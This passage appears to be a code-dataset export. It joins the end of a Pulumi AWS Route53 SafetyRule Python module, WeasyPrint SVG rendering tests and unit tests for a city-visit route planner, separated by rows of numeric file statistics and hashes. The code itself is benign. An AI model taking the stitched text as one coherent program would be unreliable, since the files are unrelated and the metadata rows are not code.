rule_config=aws.route53recoverycontrol.SafetyRuleRuleConfigArgs(
inverted=False,
threshold=1,
type="ATLEAST",
))
```
```python
import pulumi
import pulumi_aws as aws
example = aws.route53recoverycontrol.SafetyRule("example",
control_panel_arn="arn:aws:route53-recovery-control::313517334327:controlpanel/abd5fbfc052d4844a082dbf400f61da8",
wait_period_ms=5000,
gating_controls=[aws_route53recoverycontrolconfig_routing_control["example"]["arn"]],
target_controls=[aws_route53recoverycontrolconfig_routing_control["example"]["arn"]],
rule_config=aws.route53recoverycontrol.SafetyRuleRuleConfigArgs(
inverted=False,
threshold=1,
type="ATLEAST",
))
```
## Import
Route53 Recovery Control Config Safety Rule can be imported via the safety rule ARN, e.g.,
```sh
$ pulumi import aws:route53recoverycontrol/safetyRule:SafetyRule myrule arn:aws:route53-recovery-control::313517334327:controlpanel/1bfba17df8684f5dab0467b71424f7e8/safetyrule/3bacc77003364c0f
```
:param str resource_name: The name of the resource.
:param SafetyRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SafetyRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
asserted_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
control_panel_arn: Optional[pulumi.Input[str]] = None,
gating_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
rule_config: Optional[pulumi.Input[pulumi.InputType['SafetyRuleRuleConfigArgs']]] = None,
target_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
wait_period_ms: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SafetyRuleArgs.__new__(SafetyRuleArgs)
__props__.__dict__["asserted_controls"] = asserted_controls
if control_panel_arn is None and not opts.urn:
raise TypeError("Missing required property 'control_panel_arn'")
__props__.__dict__["control_panel_arn"] = control_panel_arn
__props__.__dict__["gating_controls"] = gating_controls
__props__.__dict__["name"] = name
if rule_config is None and not opts.urn:
raise TypeError("Missing required property 'rule_config'")
__props__.__dict__["rule_config"] = rule_config
__props__.__dict__["target_controls"] = target_controls
if wait_period_ms is None and not opts.urn:
raise TypeError("Missing required property 'wait_period_ms'")
__props__.__dict__["wait_period_ms"] = wait_period_ms
__props__.__dict__["arn"] = None
__props__.__dict__["status"] = None
super(SafetyRule, __self__).__init__(
'aws:route53recoverycontrol/safetyRule:SafetyRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
asserted_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
control_panel_arn: Optional[pulumi.Input[str]] = None,
gating_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
rule_config: Optional[pulumi.Input[pulumi.InputType['SafetyRuleRuleConfigArgs']]] = None,
status: Optional[pulumi.Input[str]] = None,
target_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
wait_period_ms: Optional[pulumi.Input[int]] = None) -> 'SafetyRule':
"""
Get an existing SafetyRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: ARN of the safety rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] asserted_controls: Routing controls that are part of transactions that are evaluated to determine if a request to change a routing control state is allowed.
:param pulumi.Input[str] control_panel_arn: ARN of the control panel in which this safety rule will reside.
:param pulumi.Input[Sequence[pulumi.Input[str]]] gating_controls: Gating controls for the new gating rule. That is, routing controls that are evaluated by the rule configuration that you specify.
:param pulumi.Input[str] name: Name describing the safety rule.
:param pulumi.Input[pulumi.InputType['SafetyRuleRuleConfigArgs']] rule_config: Configuration block for safety rule criteria. See below.
:param pulumi.Input[str] status: Status of the safety rule. `PENDING` when it is being created/updated, `PENDING_DELETION` when it is being deleted, and `DEPLOYED` otherwise.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_controls: Routing controls that can only be set or unset if the specified `rule_config` evaluates to true for the specified `gating_controls`.
:param pulumi.Input[int] wait_period_ms: Evaluation period, in milliseconds (ms), during which any request against the target routing controls will fail.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SafetyRuleState.__new__(_SafetyRuleState)
__props__.__dict__["arn"] = arn
__props__.__dict__["asserted_controls"] = asserted_controls
__props__.__dict__["control_panel_arn"] = control_panel_arn
__props__.__dict__["gating_controls"] = gating_controls
__props__.__dict__["name"] = name
__props__.__dict__["rule_config"] = rule_config
__props__.__dict__["status"] = status
__props__.__dict__["target_controls"] = target_controls
__props__.__dict__["wait_period_ms"] = wait_period_ms
return SafetyRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
ARN of the safety rule.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="assertedControls")
def asserted_controls(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Routing controls that are part of transactions that are evaluated to determine if a request to change a routing control state is allowed.
"""
return pulumi.get(self, "asserted_controls")
@property
@pulumi.getter(name="controlPanelArn")
def control_panel_arn(self) -> pulumi.Output[str]:
"""
ARN of the control panel in which this safety rule will reside.
"""
return pulumi.get(self, "control_panel_arn")
@property
@pulumi.getter(name="gatingControls")
def gating_controls(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Gating controls for the new gating rule. That is, routing controls that are evaluated by the rule configuration that you specify.
"""
return pulumi.get(self, "gating_controls")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name describing the safety rule.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="ruleConfig")
def rule_config(self) -> pulumi.Output['outputs.SafetyRuleRuleConfig']:
"""
Configuration block for safety rule criteria. See below.
"""
return pulumi.get(self, "rule_config")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Status of the safety rule. `PENDING` when it is being created/updated, `PENDING_DELETION` when it is being deleted, and `DEPLOYED` otherwise.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="targetControls")
def target_controls(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Routing controls that can only be set or unset if the specified `rule_config` evaluates to true for the specified `gating_controls`.
"""
return pulumi.get(self, "target_controls")
@property
@pulumi.getter(name="waitPeriodMs")
def wait_period_ms(self) -> pulumi.Output[int]:
"""
Evaluation period, in milliseconds (ms), during which any request against the target routing controls will fail.
"""
return pulumi.get(self, "wait_period_ms")
| 48.319372
| 213
| 0.669953
| 3,225
| 27,687
| 5.542946
| 0.066977
| 0.089841
| 0.061871
| 0.054542
| 0.89388
| 0.881685
| 0.864175
| 0.852708
| 0.840512
| 0.811479
| 0
| 0.01283
| 0.23148
| 27,687
| 572
| 214
| 48.403846
| 0.827286
| 0.393867
| 0
| 0.685619
| 1
| 0
| 0.11443
| 0.01917
| 0
| 0
| 0
| 0
| 0.086957
| 1
| 0.160535
| false
| 0.003344
| 0.023411
| 0
| 0.280936
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b40cd177016734ab5147f4d258b8eab3bb69465f
| 7,016
|
py
|
Python
|
tests/draw/svg/test_images.py
|
LikuraGong/WeasyPrint
|
5fe7ef6b22ae1265a52dee422e1c3b6777519ca3
|
[
"BSD-3-Clause"
] | null | null | null |
tests/draw/svg/test_images.py
|
LikuraGong/WeasyPrint
|
5fe7ef6b22ae1265a52dee422e1c3b6777519ca3
|
[
"BSD-3-Clause"
] | null | null | null |
tests/draw/svg/test_images.py
|
LikuraGong/WeasyPrint
|
5fe7ef6b22ae1265a52dee422e1c3b6777519ca3
|
[
"BSD-3-Clause"
] | null | null | null |
"""
weasyprint.tests.test_draw.svg.test_images
------------------------------------------
Test how images are drawn in SVG.
"""
import pytest
from weasyprint.urls import path2url
from ...testing_utils import assert_no_logs, resource_filename
from .. import assert_pixels
@assert_no_logs
def test_image_svg():
assert_pixels('test_image_svg', 4, 4, '''
____
____
__B_
____
''', '''
<style>
@page { size: 4px 4px }
svg { display: block }
</style>
<svg width="4px" height="4px" xmlns="http://www.w3.org/2000/svg">
<svg x="1" y="1" width="2" height="2" viewBox="0 0 10 10">
<rect x="5" y="5" width="5" height="5" fill="blue" />
</svg>
</svg>
''')
@assert_no_logs
def test_image_svg_viewbox():
assert_pixels('test_image_svg_viewbox', 4, 4, '''
____
____
__B_
____
''', '''
<style>
@page { size: 4px 4px }
svg { display: block }
</style>
<svg viewBox="0 0 4 4" xmlns="http://www.w3.org/2000/svg">
<svg x="1" y="1" width="2" height="2" viewBox="0 0 10 10">
<rect x="5" y="5" width="5" height="5" fill="blue" />
</svg>
</svg>
''')
@assert_no_logs
def test_image_svg_align_default():
assert_pixels('test_image_svg_align_default', 8, 8, '''
__BRRR__
__BRRR__
__RRRG__
__RRRG__
________
________
________
________
''', '''
<style>
@page { size: 8px 8px }
svg { display: block }
</style>
<svg width="8px" height="4px" viewBox="0 0 4 4"
xmlns="http://www.w3.org/2000/svg">
<rect width="4" height="4" fill="red" />
<rect width="1" height="2" fill="blue" />
<rect x="3" y="2" width="1" height="2" fill="lime" />
</svg>
''')
@assert_no_logs
def test_image_svg_align_none():
assert_pixels('test_image_svg_align_none', 8, 8, '''
BBRRRRRR
BBRRRRRR
RRRRRRGG
RRRRRRGG
________
________
________
________
''', '''
<style>
@page { size: 8px 8px }
svg { display: block }
</style>
<svg width="8px" height="4px" viewBox="0 0 4 4"
preserveAspectRatio="none"
xmlns="http://www.w3.org/2000/svg">
<rect width="4" height="4" fill="red" />
<rect width="1" height="2" fill="blue" />
<rect x="3" y="2" width="1" height="2" fill="lime" />
</svg>
''')
@assert_no_logs
def test_image_svg_align_meet_x():
assert_pixels('test_image_svg_align_meet_x', 8, 8, '''
____BRRR
____BRRR
____RRRG
____RRRG
________
________
________
________
''', '''
<style>
@page { size: 8px 8px }
svg { display: block }
</style>
<svg width="8px" height="4px" viewBox="0 0 4 4"
preserveAspectRatio="xMaxYMax meet"
xmlns="http://www.w3.org/2000/svg">
<rect width="4" height="4" fill="red" />
<rect width="1" height="2" fill="blue" />
<rect x="3" y="2" width="1" height="2" fill="lime" />
</svg>
''')
@assert_no_logs
def test_image_svg_align_meet_y():
assert_pixels('test_image_svg_align_meet_y', 8, 8, '''
________
________
________
________
BRRR____
BRRR____
RRRG____
RRRG____
''', '''
<style>
@page { size: 8px 8px }
svg { display: block }
</style>
<svg width="4px" height="8px" viewBox="0 0 4 4"
preserveAspectRatio="xMaxYMax meet"
xmlns="http://www.w3.org/2000/svg">
<rect width="4" height="4" fill="red" />
<rect width="1" height="2" fill="blue" />
<rect x="3" y="2" width="1" height="2" fill="lime" />
</svg>
''')
@assert_no_logs
def test_image_svg_align_slice_x():
assert_pixels('test_image_svg_align_slice_x', 8, 8, '''
BBRRRRRR
BBRRRRRR
BBRRRRRR
BBRRRRRR
________
________
________
________
''', '''
<style>
@page { size: 8px 8px }
svg { display: block }
</style>
<svg width="8px" height="4px" viewBox="0 0 4 4"
preserveAspectRatio="xMinYMin slice"
xmlns="http://www.w3.org/2000/svg">
<rect width="4" height="4" fill="red" />
<rect width="1" height="2" fill="blue" />
<rect x="3" y="2" width="1" height="2" fill="lime" />
</svg>
''')
@assert_no_logs
def test_image_svg_align_slice_y():
assert_pixels('test_image_svg_align_slice_y', 8, 8, '''
BBRR____
BBRR____
BBRR____
BBRR____
RRRR____
RRRR____
RRRR____
RRRR____
''', '''
<style>
@page { size: 8px 8px }
svg { display: block }
</style>
<svg width="4px" height="8px" viewBox="0 0 4 4"
preserveAspectRatio="xMinYMin slice"
xmlns="http://www.w3.org/2000/svg">
<rect width="4" height="4" fill="red" />
<rect width="1" height="2" fill="blue" />
<rect x="3" y="2" width="1" height="2" fill="lime" />
</svg>
''')
@pytest.mark.xfail
@assert_no_logs
def test_image_svg_percentage():
assert_pixels('test_image_svg_percentage', 4, 4, '''
____
____
__B_
____
''', '''
<style>
@page { size: 4px 4px }
svg { display: block }
</style>
<svg width="100%" height="100%" xmlns="http://www.w3.org/2000/svg">
<svg x="1" y="1" width="50%" height="50%" viewBox="0 0 10 10">
<rect x="5" y="5" width="5" height="5" fill="blue" />
</svg>
</svg>
''')
def test_image_svg_wrong():
assert_pixels('test_image_svg_wrong', 4, 4, '''
____
____
____
____
''', '''
<style>
@page { size: 4px 4px }
svg { display: block }
</style>
<svg width="4px" height="4px" xmlns="http://www.w3.org/2000/svg">
<That’s bad!
</svg>
''')
@assert_no_logs
def test_image_image():
assert_pixels('test_image_image', 4, 4, '''
rBBB
BBBB
BBBB
BBBB
''', '''
<style>
@page { size: 4px 4px }
svg { display: block }
</style>
<svg width="4px" height="4px" xmlns="http://www.w3.org/2000/svg">
<image xlink:href="%s" />
</svg>
''' % path2url(resource_filename('pattern.png')))
def test_image_image_wrong():
assert_pixels('test_image_image_wrong', 4, 4, '''
____
____
____
____
''', '''
<style>
@page { size: 4px 4px }
svg { display: block }
</style>
<svg width="4px" height="4px" xmlns="http://www.w3.org/2000/svg">
<image xlink:href="it doesn’t exist, mouhahahaha" />
</svg>
''')
| 24.879433
| 73
| 0.513398
| 831
| 7,016
| 3.799037
| 0.109507
| 0.068419
| 0.076022
| 0.079823
| 0.847007
| 0.789991
| 0.770352
| 0.700982
| 0.700982
| 0.699398
| 0
| 0.053613
| 0.319413
| 7,016
| 281
| 74
| 24.967972
| 0.607539
| 0.017104
| 0
| 0.846774
| 0
| 0.072581
| 0.812509
| 0.0544
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.048387
| true
| 0
| 0.016129
| 0
| 0.064516
| 0.004032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b44a7a4e5286bba3c597153e9b2a86eee7892dd2
| 14,954
|
py
|
Python
|
router/city_visit_router_test.py
|
awesome-archive/city_visit_planner
|
20befca3d70db61bc83356eedd490a298b27f96f
|
[
"MIT"
] | 1
|
2019-11-14T22:08:59.000Z
|
2019-11-14T22:08:59.000Z
|
router/city_visit_router_test.py
|
sandoche/city_visit_planner
|
20befca3d70db61bc83356eedd490a298b27f96f
|
[
"MIT"
] | null | null | null |
router/city_visit_router_test.py
|
sandoche/city_visit_planner
|
20befca3d70db61bc83356eedd490a298b27f96f
|
[
"MIT"
] | null | null | null |
import datetime
import unittest
from data import city_visit
from router import day_visit_cost_calculator
from router import city_visit_router
from router import cost_accumulator
from router import point_fit as point_fit_
from router import day_visit_router as day_visit_router_
from router import city_visit_points_left
from router import test_util
from router import points_queue
from router import city_visit_accumulator
class CityVisitRouterTest(unittest.TestCase):
@staticmethod
def GetDayVisitParameters(start_datetime, end_datetime):
return city_visit.DayVisitParameters(
start_datetime=start_datetime,
end_datetime=end_datetime,
lunch_start_datetime=datetime.datetime(
start_datetime.year, start_datetime.month, start_datetime.day,
13, 0, 0),
lunch_hours=1.,
start_coordinates=test_util.MockCoordinates('Hotel'),
end_coordinates=test_util.MockCoordinates('Restaurant'))
def setUp(self):
no_point_visit_factor = 0.
no_point_visit_const = 1000.
unused_time_factor = 0.01
day_visit_heap_size = 1000
shard_num_days = 2
max_depth = 1
city_visit_heap_size = 10
max_non_pushed_points = 3
self.points = test_util.MockPoints()
move_calculator = test_util.MockMoveCalculator()
point_fit = point_fit_.SimplePointFit()
cost_accumulator_generator=cost_accumulator.FactorCostAccumulatorGenerator(
no_point_visit_factor=no_point_visit_factor,
no_point_visit_const=no_point_visit_const,
unused_time_factor=unused_time_factor)
day_visit_cost_calculator_generator = day_visit_cost_calculator.DayVisitCostCalculatorGenerator(
move_calculator=move_calculator,
point_fit=point_fit,
cost_accumulator_generator=cost_accumulator_generator)
day_visit_router = day_visit_router_.DayVisitRouter(
calculator_generator=day_visit_cost_calculator_generator,
day_visit_heap_size=day_visit_heap_size)
city_visit_points_left_generator = city_visit_points_left.CityVisitPointsLeftGenerator(
cost_accumulator_generator=cost_accumulator_generator)
points_queue_generator = points_queue.OneByOnePointsQueueGenerator()
self.city_visit_router = city_visit_router.CityVisitRouter(
day_visit_router=day_visit_router,
city_visit_points_left_generator=city_visit_points_left_generator,
points_queue_generator=points_queue_generator,
shard_num_days=shard_num_days,
max_depth=max_depth,
city_visit_heap_size=city_visit_heap_size,
max_non_pushed_points=max_non_pushed_points,
num_processes=None)
self.city_visit_accumulator_generator = city_visit_accumulator.CityVisitAccumulatorGenerator()
super(CityVisitRouterTest, self).setUp()
def testOneShortDay(self):
day_visit_parameterss = [
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 1, 17, 0, 0),
end_datetime=datetime.datetime(2014, 9, 1, 21, 0, 0))]
# Union Square would fit but it's after 3 failed points.
city_visit_best, point_left = self.city_visit_router.RouteCityVisit(
[self.points['Twin Peaks'],
self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Golden Gate Bridge'],
self.points['Union Square']],
day_visit_parameterss,
self.city_visit_accumulator_generator)
day_visits = city_visit_best.day_visits
self.assertEqual(1, len(day_visits))
self.assertEqual([], day_visits[0].GetPoints())
self.assertEqual("""Date: 2014-09-01
Walking from Hotel to Restaurant from 17:00:00 to 18:00:00
Cost: 2.80
Price: 0.00
Total cost: 5002.80
Total price: 0.00""", str(city_visit_best))
self.assertEqual(
[self.points['Twin Peaks'],
self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Golden Gate Bridge'],
self.points['Union Square']],
point_left)
def testOneDay(self):
day_visit_parameterss = [
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 1, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 1, 21, 0, 0))]
city_visit_best, point_left = self.city_visit_router.RouteCityVisit(
[self.points['Twin Peaks'],
self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Golden Gate Bridge'],
self.points['Union Square']],
day_visit_parameterss,
self.city_visit_accumulator_generator)
day_visits = city_visit_best.day_visits
self.assertEqual(1, len(day_visits))
self.assertEqual(
[self.points['Ferry Building'],
self.points['Union Square'],
self.points['Twin Peaks']], day_visits[0].GetPoints())
self.assertEqual("""Date: 2014-09-01
Walking from Hotel to Ferry Building from 09:00:00 to 10:00:00
Visiting point "Ferry Building" from 10:00:00 to 11:00:00
Walking from Ferry Building to Union Square from 11:00:00 to 13:00:00
Having lunch from 13:00:00 to 14:00:00
Visiting point "Union Square" from 14:00:00 to 15:00:00
Walking from Union Square to Twin Peaks from 15:00:00 to 18:00:00
Visiting point "Twin Peaks" from 18:00:00 to 18:30:00
Walking from Twin Peaks to Restaurant from 18:30:00 to 20:30:00
Cost: 11.80
Price: 0.00
Total cost: 2011.80
Total price: 0.00""", str(city_visit_best))
self.assertEqual(
[self.points['Pier 39'],
self.points['Golden Gate Bridge']],
point_left)
def testOneLongDayOneShortDay(self):
day_visit_parameterss = [
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 1, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 1, 23, 0, 0)),
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 2, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 2, 21, 0, 0))]
city_visit_best, point_left = self.city_visit_router.RouteCityVisit(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Golden Gate Bridge'],
self.points['Union Square']],
day_visit_parameterss,
self.city_visit_accumulator_generator)
day_visits = city_visit_best.day_visits
self.assertEqual(2, len(day_visits))
self.assertEqual(
[self.points['Golden Gate Bridge']], day_visits[0].GetPoints())
self.assertEqual(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Union Square']], day_visits[1].GetPoints())
self.assertEqual("""Date: 2014-09-01
Walking from Hotel to Golden Gate Bridge from 09:00:00 to 15:00:00
Having lunch from 15:00:00 to 16:00:00
Visiting point "Golden Gate Bridge" from 16:00:00 to 16:30:00
Walking from Golden Gate Bridge to Restaurant from 16:30:00 to 22:30:00
Cost: 13.80
Price: 0.00
Date: 2014-09-02
Walking from Hotel to Ferry Building from 09:00:00 to 10:00:00
Visiting point "Ferry Building" from 10:00:00 to 11:00:00
Walking from Ferry Building to Pier 39 from 11:00:00 to 12:00:00
Having lunch from 12:00:00 to 13:00:00
Visiting point "Pier 39" from 13:00:00 to 16:00:00
Walking from Pier 39 to Union Square from 16:00:00 to 18:00:00
Visiting point "Union Square" from 18:00:00 to 19:00:00
Walking from Union Square to Restaurant from 19:00:00 to 20:00:00
Cost: 11.60
Price: 0.00
Total cost: 25.40
Total price: 0.00""", str(city_visit_best))
self.assertEqual([], point_left)
def testTwoDays(self):
day_visit_parameterss = [
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 1, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 1, 21, 0, 0)),
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 2, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 2, 21, 0, 0))]
city_visit_best, point_left = self.city_visit_router.RouteCityVisit(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Golden Gate Bridge'],
self.points['Union Square'],
self.points['Twin Peaks']],
day_visit_parameterss,
self.city_visit_accumulator_generator)
day_visits = city_visit_best.day_visits
self.assertEqual(2, len(day_visits))
self.assertEqual(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Union Square']], day_visits[0].GetPoints())
self.assertEqual(
[self.points['Twin Peaks']], day_visits[1].GetPoints())
self.assertEqual("""Date: 2014-09-01
Walking from Hotel to Ferry Building from 09:00:00 to 10:00:00
Visiting point "Ferry Building" from 10:00:00 to 11:00:00
Walking from Ferry Building to Pier 39 from 11:00:00 to 12:00:00
Having lunch from 12:00:00 to 13:00:00
Visiting point "Pier 39" from 13:00:00 to 16:00:00
Walking from Pier 39 to Union Square from 16:00:00 to 18:00:00
Visiting point "Union Square" from 18:00:00 to 19:00:00
Walking from Union Square to Restaurant from 19:00:00 to 20:00:00
Cost: 11.60
Price: 0.00
Date: 2014-09-02
Walking from Hotel to Twin Peaks from 09:00:00 to 12:00:00
Visiting point "Twin Peaks" from 12:00:00 to 12:30:00
Having lunch from 12:30:00 to 13:30:00
Walking from Twin Peaks to Restaurant from 13:30:00 to 15:30:00
Cost: 9.80
Price: 0.00
Total cost: 1021.40
Total price: 0.00""", str(city_visit_best))
self.assertEqual(
[self.points['Golden Gate Bridge']],
point_left)
def testTwoDaysOneShortDay(self):
day_visit_parameterss = [
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 1, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 1, 23, 0, 0)),
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 2, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 2, 21, 0, 0)),
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 3, 17, 0, 0),
end_datetime=datetime.datetime(2014, 9, 3, 21, 0, 0))]
city_visit_best, point_left = self.city_visit_router.RouteCityVisit(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Golden Gate Bridge'],
self.points['Union Square'],
self.points['Twin Peaks']],
day_visit_parameterss,
self.city_visit_accumulator_generator)
day_visits = city_visit_best.day_visits
self.assertEqual(3, len(day_visits))
self.assertEqual(
[self.points['Twin Peaks']], day_visits[0].GetPoints())
self.assertEqual(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Union Square']], day_visits[1].GetPoints())
self.assertEqual([], day_visits[2].GetPoints())
self.assertEqual("""Date: 2014-09-01
Walking from Hotel to Twin Peaks from 09:00:00 to 12:00:00
Visiting point "Twin Peaks" from 12:00:00 to 12:30:00
Having lunch from 12:30:00 to 13:30:00
Walking from Twin Peaks to Restaurant from 13:30:00 to 15:30:00
Cost: 11.00
Price: 0.00
Date: 2014-09-02
Walking from Hotel to Ferry Building from 09:00:00 to 10:00:00
Visiting point "Ferry Building" from 10:00:00 to 11:00:00
Walking from Ferry Building to Pier 39 from 11:00:00 to 12:00:00
Having lunch from 12:00:00 to 13:00:00
Visiting point "Pier 39" from 13:00:00 to 16:00:00
Walking from Pier 39 to Union Square from 16:00:00 to 18:00:00
Visiting point "Union Square" from 18:00:00 to 19:00:00
Walking from Union Square to Restaurant from 19:00:00 to 20:00:00
Cost: 11.60
Price: 0.00
Date: 2014-09-03
Walking from Hotel to Restaurant from 17:00:00 to 18:00:00
Cost: 2.80
Price: 0.00
Total cost: 1025.40
Total price: 0.00""", str(city_visit_best))
self.assertEqual(
[self.points['Golden Gate Bridge']],
point_left)
def testThreeDays(self):
day_visit_parameterss = [
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 1, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 1, 21, 0, 0)),
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 2, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 2, 21, 0, 0)),
CityVisitRouterTest.GetDayVisitParameters(
start_datetime=datetime.datetime(2014, 9, 3, 9, 0, 0),
end_datetime=datetime.datetime(2014, 9, 3, 23, 0, 0))]
city_visit_best, point_left = self.city_visit_router.RouteCityVisit(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Golden Gate Bridge'],
self.points['Union Square'],
self.points['Twin Peaks']],
day_visit_parameterss,
self.city_visit_accumulator_generator)
day_visits = city_visit_best.day_visits
self.assertEqual(3, len(day_visits))
self.assertEqual(
[self.points['Ferry Building'],
self.points['Pier 39'],
self.points['Union Square']], day_visits[0].GetPoints())
self.assertEqual(
[self.points['Twin Peaks']], day_visits[1].GetPoints())
self.assertEqual(
[self.points['Golden Gate Bridge']], day_visits[2].GetPoints())
self.assertEqual("""Date: 2014-09-01
Walking from Hotel to Ferry Building from 09:00:00 to 10:00:00
Visiting point "Ferry Building" from 10:00:00 to 11:00:00
Walking from Ferry Building to Pier 39 from 11:00:00 to 12:00:00
Having lunch from 12:00:00 to 13:00:00
Visiting point "Pier 39" from 13:00:00 to 16:00:00
Walking from Pier 39 to Union Square from 16:00:00 to 18:00:00
Visiting point "Union Square" from 18:00:00 to 19:00:00
Walking from Union Square to Restaurant from 19:00:00 to 20:00:00
Cost: 11.60
Price: 0.00
Date: 2014-09-02
Walking from Hotel to Twin Peaks from 09:00:00 to 12:00:00
Visiting point "Twin Peaks" from 12:00:00 to 12:30:00
Having lunch from 12:30:00 to 13:30:00
Walking from Twin Peaks to Restaurant from 13:30:00 to 15:30:00
Cost: 9.80
Price: 0.00
Date: 2014-09-03
Walking from Hotel to Golden Gate Bridge from 09:00:00 to 15:00:00
Having lunch from 15:00:00 to 16:00:00
Visiting point "Golden Gate Bridge" from 16:00:00 to 16:30:00
Walking from Golden Gate Bridge to Restaurant from 16:30:00 to 22:30:00
Cost: 13.80
Price: 0.00
Total cost: 35.20
Total price: 0.00""", str(city_visit_best))
self.assertEqual([], point_left)
if __name__ == '__main__':
unittest.main()
| 41.423823
| 101
| 0.685235
| 2,194
| 14,954
| 4.516864
| 0.066545
| 0.040363
| 0.032089
| 0.06781
| 0.843088
| 0.811302
| 0.779717
| 0.759637
| 0.755903
| 0.726236
| 0
| 0.109432
| 0.212318
| 14,954
| 360
| 102
| 41.538889
| 0.731896
| 0.003611
| 0
| 0.716012
| 0
| 0
| 0.343995
| 0
| 0
| 0
| 0
| 0
| 0.090634
| 1
| 0.024169
| false
| 0
| 0.036254
| 0.003021
| 0.066465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4523473b689a004650a8637317d179dfe54d566
| 10,625
|
py
|
Python
|
alpharotate/libs/models/samplers/fcos/sampler_fcos_h.py
|
chisyliu/RotationDetection
|
6f2bd55a51a6de0bcd0959a85977682511fd440d
|
[
"Apache-2.0"
] | 2
|
2022-03-05T09:55:49.000Z
|
2022-03-05T10:12:51.000Z
|
alpharotate/libs/models/samplers/fcos/sampler_fcos_h.py
|
junhai0428/RotationDetection
|
